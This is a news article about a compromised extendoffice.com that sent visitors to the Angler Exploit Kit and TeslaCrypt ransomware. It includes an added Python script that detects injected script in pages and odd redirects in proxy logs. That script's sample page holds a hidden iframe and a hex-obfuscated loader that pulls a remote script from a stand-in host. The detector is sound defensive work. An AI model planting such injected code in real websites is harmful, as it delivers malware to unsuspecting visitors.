SpiderLabs, the ethical hacker team inside Trustwave, has revealed that a compromised website has been serving up malware including the TeslaCrypt ransomware. The site has been identified as www.extendoffice.com, which SpiderLabs researchers claim failed to properly patch its website software.
According to the blog post from Trustwave researcher Rami Kogan, visitors to the extendoffice website were being redirected to a site where they were exposed to the Angler Exploit Kit. Those visitors who were not protected against this malware were infected with the TeslaCrypt ransomware. It is not yet known how many people have been infected and had their files locked, but Kogan believes it could be millions of users.
As with all numbers around malware infections there is a lot of speculation and assumption going on here. Kogan says that by using the ranking of extendoffice by Alexa it is likely that over a million visitors per month would have been redirected to the malware. What cannot be known is how many of these were ultimately infected although the Angler Exploit Kit has a reputation among security researchers of being very effective.
SpiderLabs blame poor patching
In Kogan’s blog he points out that a daily check of telemetry data from Trustwave customers alerted the SpiderLabs team to something being wrong. A check of the data showed that this had been going on for a couple of weeks at least and this led the team to do further research.
What they discovered was that extendoffice was still using an old version of Joomla that was known to be susceptible to a script injection attack. A patch for this was issued in December, but not until it had been successfully exploited on other sites. Kogan says that the code installed on the extendoffice website had been obfuscated to make it harder to spot. He then talks in his blog about some of the things the attackers had done to bypass security engines.
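As an added illustration, not taken from the Trustwave post or from this article, the script below shows two defender-side checks of the kind the telemetry and obfuscated-script findings above imply: a scan of a site's HTML for injected obfuscated script and hidden iframes, and a scan of proxy telemetry for visitors being sent from a trusted site to an unrelated third-party host. The sample pages, log lines and hostnames (site.example, landing.invalid) are all constructed for the example and are not the real extendoffice content or the real redirect target.

```python
"""Two defender-side checks prompted by a compromised-CMS redirect case:
(1) scan page HTML for injected, obfuscated script and hidden iframes,
(2) scan proxy telemetry for referrals from a trusted site to an unrelated host.
All sample data below is constructed; none of it comes from the real incident."""
import re
from urllib.parse import urlparse

# --- 1. Injected-script scan --------------------------------------------------

SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.I | re.S)
IFRAME_RE = re.compile(r"<iframe[^>]*>", re.I)

# Each indicator: (name, regex applied to the body of an inline <script>)
SCRIPT_INDICATORS = [
    ("eval", re.compile(r"\beval\s*\(")),
    ("unescape", re.compile(r"\bunescape\s*\(")),
    ("from_char_code", re.compile(r"String\.fromCharCode")),
    ("dom_write", re.compile(r"document\.write\s*\(")),
    # eight or more consecutive \xNN escapes: a string hidden from a plain grep
    ("hex_escape_run", re.compile(r"(\\x[0-9a-fA-F]{2}){8,}")),
    # a long base64-looking blob with no whitespace
    ("base64_blob", re.compile(r"[A-Za-z0-9+/]{80,}={0,2}")),
]
HIDDEN_IFRAME_RE = re.compile(
    r"""(width|height)\s*=\s*["']?0|display\s*:\s*none|visibility\s*:\s*hidden""", re.I)


def scan_html(html: str) -> dict:
    """Return the obfuscation and hidden-iframe indicators found in one page."""
    found = []
    for body in SCRIPT_RE.findall(html):
        for name, rx in SCRIPT_INDICATORS:
            if name not in found and rx.search(body):
                found.append(name)
    for tag in IFRAME_RE.findall(html):
        if HIDDEN_IFRAME_RE.search(tag) and "hidden_iframe" not in found:
            found.append("hidden_iframe")
    return {"score": len(found), "indicators": found}


# Constructed sample: a plain CMS page, and the same page with an injection appended
CLEAN_PAGE = """<html><head><title>Office add-in docs</title>
<script src="/media/jui/js/jquery.min.js"></script></head>
<body><h1>Welcome</h1>
<script>document.getElementById("year").textContent = new Date().getFullYear();</script>
</body></html>"""

INJECTED_PAGE = CLEAN_PAGE.replace(
    "</body>",
    '<iframe src="http://landing.invalid/gate.php" width="0" height="0" '
    'style="display:none"></iframe>'
    '<script>var _0xa1=["\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6c\\x61\\x6e\\x64'
    '\\x2e\\x69\\x6e\\x76\\x61\\x6c\\x69\\x64"];'
    'document.write(unescape("%3Cscript src=\\""+_0xa1[0]+"/j.js\\"%3E%3C/script%3E"));'
    '</script></body>',
)

# --- 2. Proxy telemetry: referrals from a trusted site to unrelated hosts ------

TELEMETRY = [  # constructed proxy log lines, space-separated key=value fields
    "ts=2016-02-06T09:00:01Z client=10.1.1.20 referer=http://site.example/excel-tips.html url=http://site.example/media/system/js/core.js status=200",
    "ts=2016-02-06T09:00:02Z client=10.1.1.20 referer=http://site.example/excel-tips.html url=http://cdn.site.example/logo.png status=200",
    "ts=2016-02-06T09:00:03Z client=10.1.1.20 referer=http://site.example/excel-tips.html url=http://landing.invalid/gate.php status=302",
    "ts=2016-02-06T09:00:04Z client=10.1.1.31 referer=- url=http://other.example/ status=200",
]


def parse_line(line: str) -> dict:
    """Split one key=value log line into a dict (values contain no spaces here)."""
    return dict(kv.split("=", 1) for kv in line.split())


def third_party_referrals(lines, site_hosts):
    """Requests whose referer is one of site_hosts but whose destination is not
    that site or one of its subdomains. A burst of these to one unfamiliar host
    is the shape a redirect injected into a compromised site leaves in telemetry."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        ref_host = urlparse(rec.get("referer", "")).hostname
        dst_host = urlparse(rec.get("url", "")).hostname
        first_party = dst_host and any(
            dst_host == h or dst_host.endswith("." + h) for h in site_hosts)
        if ref_host in site_hosts and dst_host and not first_party:
            hits.append((rec["client"], ref_host, dst_host, rec["url"]))
    return hits


if __name__ == "__main__":
    print("clean page:", scan_html(CLEAN_PAGE))
    print("injected page:", scan_html(INJECTED_PAGE))
    for hit in third_party_referrals(TELEMETRY, {"site.example"}):
        print("third-party referral:", hit)
```

The page scan is deliberately indicator-based rather than a signature for one campaign: obfuscation tooling changes, but eval/unescape wrappers, long hex-escape runs and zero-size iframes recur. The telemetry check is what a daily review of outbound proxy data can do without any knowledge of the payload, which is how a redirect like this shows up weeks before anyone looks at the site's source.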
There are two big unknowns here:
- When was extendoffice first compromised? Without knowing this it is impossible to begin to estimate the number of potential victims.
- Were versions of Trustwave’s own products susceptible to being bypassed by this attack prior to February 6th? It would be useful to know if Trustwave would have detected the redirect before February 6th or if this is the date they patched their customer installs and therefore started to receive telemetry.
In the blog Kogan says that despite contacting extendoffice and their hosting company they received no acknowledgement from either. However, he did say that a recent check on the site showed the problem had been solved and the website cleaned.
It is an ongoing battle for most websites to defend against the range of attacks directed at them. The more successful they are, the more likely they are to attract unwanted attention. Too many website owners seem to have few security processes that control when and how they patch. This is not an easy thing to solve. Over time sites become more complex, and patching can easily break functionality, which could result in the loss of customers.
There is also a problem for hosting vendors in that they cannot simply take responsibility for patching. If they were to unilaterally apply updates they could break a customer website, and that would leave them open to the risk of a lawsuit. What this means is that there is a need for better coordination between website administrators and hosting companies.
For extendoffice this is a major embarrassment and it will take time before we know all the facts in this case.